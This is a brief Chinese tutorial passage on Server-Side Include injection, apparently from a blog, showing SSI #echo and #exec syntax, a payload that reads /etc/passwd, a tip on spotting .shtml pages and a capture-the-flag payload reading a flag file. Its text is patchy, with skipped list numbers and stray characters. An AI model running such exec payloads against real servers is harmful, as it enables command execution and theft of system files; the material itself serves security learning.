SSI注入漏洞
1.2 SSI語法
首先,介紹下SHTML,在SHTML文件中使用SSI指令引用其他的html文件(#include),此時服務器會將SHTML中包含的SSI指令解釋,再傳送給客戶端,此時的HTML中就不再有SSI指令了。比如說框架是固定的,但是里面的文章,其他菜單等即可以用#include引用進來
①顯示服務器端環境變量<#echo>
本文檔名稱:
<!–#echo var="DOCUMENT_NAME"–>
現在時間:
<!–#echo var="DATE_LOCAL"–>
顯示IP地址:
<! #echo var="REMOTE_ADDR"–>
④直接執行服務器上的各種程序<#exec>(如CGI或其他可執行程序)
<!–#exec cmd="文件名稱"–>
<!--#exec cmd="cat /etc/passwd"-->
<!–#exec cgi="文件名稱"–>
<!--#exec cgi="/cgi-bin/access_log.cgi"–>
將某一外部程序的輸出插入到頁面中??刹迦隒GI程序或者是常規應用程序的輸入,這取決于使用的參數是cmd還是cgi。
SSI挖掘思路
識別頁面是否包含.stm,.shtm和.shtml后綴
題目:
?
<!--#exec cmd="cat../flag"-->?
?
總結
- 上一篇: 该如何用好EDIUS8?
- 下一篇: 宝宝博客